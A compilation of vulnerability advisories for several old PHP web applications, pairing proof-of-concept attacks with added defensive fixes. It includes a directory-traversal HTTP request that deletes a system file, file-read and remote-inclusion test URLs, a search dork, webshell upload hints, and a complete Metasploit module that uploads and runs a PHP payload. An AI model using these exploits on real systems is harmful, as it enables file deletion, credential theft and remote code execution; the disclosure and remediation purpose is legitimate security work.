
Part 1: Dotclear 2.4.2 Arbitrary File Upload Vulnerability and Fix
Title: dotclear-2.4.2 (Swf) File Upload Vulnerability
Author: T0x!c Malik_99@hotmail.fr
Download: fr.dotclear.org/download
Affected version: 2.4.2
Tested on: [Windows Xp]
Proof of concept:
/path/inc/swf/swfupload.swf
Files can be uploaded with a php extension,
e.g. c99.php, shell.gif.php, etc.
Fix (provided by www.2cto.co):
Strengthen validation of uploaded files.
Part 2: Tugux CMS 1.2 (pid) Arbitrary File Deletion Vulnerability and Fix (Vulnerability Alert)
Tugux CMS 1.2 (pid) Remote Arbitrary File Deletion Vulnerability
Vendor: Tugux Studios
Product web page: www.tugux.com
Affected version: 1.2
Summary: Tugux CMS is a free, open source content management system
(CMS) and application that powers the entire web.
Desc: Input passed to the 'pid' parameter in administrator/delete_page_parse.php
is not properly sanitised before being used to delete files. This can be exploited
to delete files with the permissions of the web server via directory traversal
sequences passed within the 'pid' parameter.
------------------------------------------------------------------------------
/administrator/delete_page_parse.php:
------------------------------------------------------------------------------
<?php
///post form. data
$id=$_POST['pid'];

$pic1 = ("slides/$id/image_01.jpg");
if (file_exists($pic1)) {
    unlink($pic1);
}
$dir = "slides/$id";
rmdir($dir);

include_once "../scripts/connect_to_mysql.php";
$query = mysqli_query($myConnection, "DELETE FROM pages WHERE id='$id' ") or die (mysqli_error($myConnection));
echo '

Operation completed.Your page has been DELETED.
Click Here to go back';
exit;
?>
------------------------------------------------------------------------------
Tested on: Microsoft Windows XP Professional SP3 (EN)
Apache 2.2.14 (Win32)
PHP 5.3.1
MySQL 5.1.41
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
liquidworm gmail com
Zero Science Lab
Advisory ID: ZSL-2011-5024
Advisory URL: www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5024.php
02.04.2011
--
POST /tugux/administrator/delete_page_parse.php HTTP/1.1
Host: www.2cto.com
Proxy-Connection: keep-alive
User-Agent: x
Content-Length: 175
Cache-Control: max-age=0
Origin: null
Content-Type: multipart/form-data; boundary=----x
Accept: text/html
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
------x
Content-Disposition: form-data; name="pid"
../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../boot.ini
------x--
Part 3: Ruubikcms v1.1.0 File Inclusion Vulnerability and Fix
Technical analysis:
source of /extra/image.php:
if (!isset($_GET['f']) OR empty($_GET['f'])) die("Please specify image.");
$fpath = BASE_DIR.$_GET['f'];
if (!is_file($fpath)) die("File does not exist.");

// file size in bytes
// $fsize = filesize($fpath);

// get mime type
$mtype = '';

if (function_exists('mime_content_type')) {
    $mtype = mime_content_type($fpath);
} elseif (function_exists('finfo_file')) {
    $finfo = finfo_open(FILEINFO_MIME); // return mime type
    $mtype = finfo_file($finfo, $fpath);
    finfo_close($finfo);
}

if ($mtype == '') {
    $mtype = "image/jpeg";
}

header("Content-type: $mtype");
readfile($fpath); // <--------------------- LFI
Test method:
/[ruubikcms1.1.0]/extra/image.php?f=../../../../../../../../boot.ini
/[ruubikcms1.1.0]/extra/image.php?f=../../../../../../../../[localfile]
Fix: filter the input.
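The Tugux 'pid' deletion in Part 2 and the Ruubikcms image.php read in Part 3 share one root cause: a request value is joined onto a base directory and used as-is, so "../" walks out of that directory. The added example below is not code from either project (resolve_inside(), SLIDES_DIR and IMAGE_DIR are assumed names); it resolves the path first and only acts on it if it still lies inside the intended directory. The same check applies to the Manhali download.php case in Part 6.

```php
<?php
// Added example, not Tugux CMS or Ruubikcms code. Names such as
// resolve_inside(), SLIDES_DIR and IMAGE_DIR are hypothetical.
define('SLIDES_DIR', __DIR__ . '/slides');   // Tugux 'pid' case
define('IMAGE_DIR',  __DIR__ . '/images');   // Ruubikcms 'f' case

// Canonical path of $relative under $base, or null if it does not exist or
// escapes $base. realpath() collapses "..", symlinks and repeated slashes,
// so the prefix test runs on the resolved path, not on the raw input.
function resolve_inside(string $base, string $relative): ?string
{
    $baseReal = realpath($base);
    $target   = realpath($base . '/' . $relative);
    if ($baseReal === false || $target === false) {
        return null;
    }
    // Trailing separator so "/www/slides2" is not accepted as inside "/www/slides".
    $prefix = $baseReal . DIRECTORY_SEPARATOR;
    return strncmp($target, $prefix, strlen($prefix)) === 0 ? $target : null;
}

// Tugux case: a page id is numeric, so reject anything else before it reaches
// unlink(), rmdir() or the SQL query (which should use a prepared statement).
function delete_page_files(string $pid): bool
{
    if (!ctype_digit($pid)) {
        return false;                    // "../../../boot.ini" stops here
    }
    $pic = resolve_inside(SLIDES_DIR, $pid . '/image_01.jpg');
    if ($pic !== null) {
        unlink($pic);
    }
    $dir = resolve_inside(SLIDES_DIR, $pid);
    return $dir !== null && rmdir($dir);
}

// Ruubikcms case: only serve a file that resolves inside IMAGE_DIR.
function serve_image(string $f): void
{
    $path = resolve_inside(IMAGE_DIR, $f);
    if ($path === null) {
        http_response_code(404);
        exit('File does not exist.');
    }
    header('Content-Type: ' . (mime_content_type($path) ?: 'image/jpeg'));
    readfile($path);
}

// Usage: delete_page_files($_POST['pid'] ?? ''); serve_image($_GET['f'] ?? '');
```

Note that the prefix comparison must be done on the realpath() result; comparing the raw string against the base directory is defeated by "../" sequences and symlinks.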
Part 4: Nodesforum 1.059 Remote File Inclusion Vulnerability and Fix
# Exploit Title: nodesforum 1.059 Remote File Inclusion Vulnerability
# Google Dork: inurl: powered by Nodesforum
# Date: 6/23/
# Author: bd0rk ( bd0rk[at]hackermail.com )
# Software-Download: home.nodesforum.com/download?file=nodesforum_1.059_with_bbcode_1.004.zip
# Tested on: Ubuntu-Linux / WinVista
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Vulnerable Code in 3rd_party_limits.php line 6 - 8
--------------------------------------------------------------------------------------------------------------
$limits_cache_url=$_nodesforum_code_path.'cache/'.$_nodesforum_db_table_name_modifier.'_3rd_party_limits.php';
if(@filemtime($limits_cache_url) && @filemtime($limits_cache_url)>(time()-(24*3600*14)))
{include($limits_cache_url);}
The parameter $limits_cache_url is built from the other parameter $_nodesforum_code_path,
so we can use the declared one.
PoC: /nodesforum/3rd_party_limits.php?_nodesforum_code_path=[RemoteShellCode]
Fixtip: Declare $_nodesforum_code_path, likewise!
Greetings: Kathrin J., Perle, x0r_32 and ZUBAIR ANJUM ;-)
#### The 22-year-old German hacker bd0rk #### <---white-hat
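The defect in Part 4 is that 3rd_party_limits.php never assigns $_nodesforum_code_path before using it, so with register_globals enabled the request supplies it. The following is an added example, not Nodesforum code, of the hardened form of that include; it assumes $_nodesforum_db_table_name_modifier is set by the application's own configuration earlier in the request.

```php
<?php
// Added example, not Nodesforum code: a hardened form of the cache include in
// 3rd_party_limits.php. $_nodesforum_db_table_name_modifier is assumed to be
// set by the application's own configuration before this point.

// 1. Assign the path yourself. With register_globals=On, a variable the script
//    never assigns is whatever the request supplies, which is how the PoC above
//    substitutes a URL; a variable the script assigns cannot be replaced.
//    Keep register_globals=Off and allow_url_include=Off in php.ini as well.
$_nodesforum_code_path = __DIR__ . '/';

// 2. Reduce the only other variable part to characters that cannot form a
//    directory separator, a URL scheme or a null byte, in case it too reaches
//    this point unassigned.
$modifier = isset($_nodesforum_db_table_name_modifier)
    ? preg_replace('/[^A-Za-z0-9_]/', '', $_nodesforum_db_table_name_modifier)
    : '';

// Every component is now fixed by this file or whitelisted, so the path cannot
// leave cache/ and cannot be a URL.
$limits_cache_url = $_nodesforum_code_path . 'cache/' . $modifier . '_3rd_party_limits.php';

// 3. Check with is_file() (not a silenced filemtime()) that a regular local
//    file exists, then apply the original 14-day freshness rule.
if (is_file($limits_cache_url) && filemtime($limits_cache_url) > (time() - (24 * 3600 * 14))) {
    include $limits_cache_url;
}
```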
Part 5: EGallery PHP File Upload Vulnerability and Fix (Vulnerability Alert)
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info={})
    super(update_info(info,
      'Name'           => "EGallery PHP File Upload Vulnerability",
      'Description'    => %q{
        This module exploits a vulnerability found in EGallery 1.2. By abusing the
        uploadify.php file, a malicious user can upload a file to the egallery/ directory
        without any authentication, which results in arbitrary code execution. The module
        has been tested successfully on Ubuntu 10.04.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Sammy FORGIT', # Discovery, PoC
          'juan'          # Metasploit module
        ],
      'References'     =>
        [
          ['OSVDB', '83891'],
          ['BID', '54464'],
          ['URL', 'www.opensyscom.fr/Actualites/egallery-arbitrary-file-upload-vulnerability.html']
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00"
        },
      'DefaultOptions' =>
        {
          'ExitFunction' => "none"
        },
      'Platform'       => ['php'],
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          ['EGallery 1.2', {}]
        ],
      'Privileged'     => false,
      'DisclosureDate' => "Jul 08 ",
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The base path to EGallery', '/sample'])
      ], self.class)
  end

  def check
    uri = target_uri.path
    uri << '/' if uri[-1,1] != '/'

    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => "#{uri}egallery/uploadify.php"
    })

    if res and res.code == 200 and res.body.empty?
      return Exploit::CheckCode::Detected
    else
      return Exploit::CheckCode::Safe
    end
  end

  def exploit
    uri = target_uri.path
    uri << '/' if uri[-1,1] != '/'

    peer = "#{rhost}:#{rport}"

    payload_name = rand_text_alpha(rand(10) + 5) + '.php'

    boundary = Rex::Text.rand_text_hex(7)
    post_data = "--#{boundary}\r\n"
    post_data << "Content-Disposition: form-data; name=\"Filename\"\r\n\r\n"
    post_data << "#{payload_name}\r\n"
    post_data << "--#{boundary}\r\n"
    post_data << "Content-Disposition: form-data; name=\"folder\"\r\n\r\n"
    post_data << "#{uri}\r\n"
    post_data << "--#{boundary}\r\n"
    post_data << "Content-Disposition: form-data; name=\"Filedata\"; filename=\"#{payload_name}\"\r\n\r\n"
    post_data << "<?php "
    post_data << payload.encoded
    post_data << " ?>\r\n"
    post_data << "--#{boundary}--\r\n"

    print_status("#{peer} - Sending PHP payload (#{payload_name})")
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => "#{uri}egallery/uploadify.php",
      'ctype'  => "multipart/form-data; boundary=#{boundary}",
      'data'   => post_data
    })

    # If the server returns 200 and the body contains our payload name,
    # we assume we uploaded the malicious file successfully
    if not res or res.code != 200 or res.body !~ /#{payload_name}/
      print_error("#{peer} - File wasn't uploaded, aborting!")
      return
    end

    print_status("#{peer} - Executing PHP payload (#{payload_name})")
    # Execute our payload
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => "#{uri}#{payload_name}"
    })

    # If we don't get a 200 when we request our malicious payload, we suspect
    # we don't have a shell, either. Print the status code for debugging purposes.
    if res and res.code != 200
      print_status("#{peer} - Server returned #{res.code.to_s}")
    end
  end
end
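The Dotclear swfupload case in Part 1 and the EGallery uploadify.php case in Part 5 both come down to an upload handler that stores whatever name and content the client sends, so a .php (or shell.gif.php) file lands in a web-served directory. The handler below is an added example, not code from either project (UPLOAD_DIR, the Filedata field name and store_image_upload() are assumptions); it checks every extension in the name, verifies the content is really an image, and never reuses the client's file name.

```php
<?php
// Added example, not Dotclear or EGallery code. UPLOAD_DIR, the field name
// and store_image_upload() are hypothetical.
define('UPLOAD_DIR', dirname(__DIR__) . '/uploads'); // outside the web root

// Returns the stored file name on success, or an "error: ..." string.
function store_image_upload(array $file): string
{
    if (!isset($file['tmp_name'], $file['name']) || ($file['error'] ?? -1) !== UPLOAD_ERR_OK) {
        return 'error: incomplete upload';
    }
    $allowed = ['jpg' => 'image/jpeg', 'jpeg' => 'image/jpeg',
                'png' => 'image/png', 'gif' => 'image/gif'];

    // Look at every extension, not just the last one: "shell.gif.php" and
    // "shell.php.gif" both carry a non-image extension and are rejected.
    $parts = explode('.', strtolower(basename($file['name'])));
    array_shift($parts);                     // drop the base name
    if ($parts === [] || array_diff($parts, array_keys($allowed)) !== []) {
        return 'error: extension not allowed';
    }
    $ext = end($parts);

    // Content check: the bytes must be an image of the declared type. A PHP
    // or SWF body under a .gif name fails here even though the name passed.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime  = $finfo->file($file['tmp_name']);
    if ($mime !== $allowed[$ext] || getimagesize($file['tmp_name']) === false) {
        return 'error: content does not match extension';
    }

    // Never keep the client's name: a server-generated name removes any
    // influence over the stored path and cannot collide with existing files.
    $dest = UPLOAD_DIR . '/' . bin2hex(random_bytes(8)) . '.' . $ext;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        return 'error: could not store file';
    }
    return basename($dest);
}

// Usage: echo store_image_upload($_FILES['Filedata'] ?? []);
```

Because UPLOAD_DIR is outside the document root, stored files are only reachable through a script that sets Content-Type from the same whitelist, so even an image carrying embedded PHP is never executed by the web server.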
Part 6: Manhali v1.8 Local File Inclusion Vulnerability and Fix
Title: Manhali v1.8 Local File Inclusion Vulnerability
Author: L0n3ly-H34rT l0n3ly_h34rt@hotmail.com
Developer: www.manhali.com/
Download: sourceforge.net/projects/manhali/files/manhali_1.8.zip/download
Affected version: 1.8 (older versions may also be affected; not checked)
Tested on: Linux/Windows
############################################
# P.O.C :
/manhali/includes/download.php?f=../includes/dbconfig.php
############################################
# Greetz to my friendz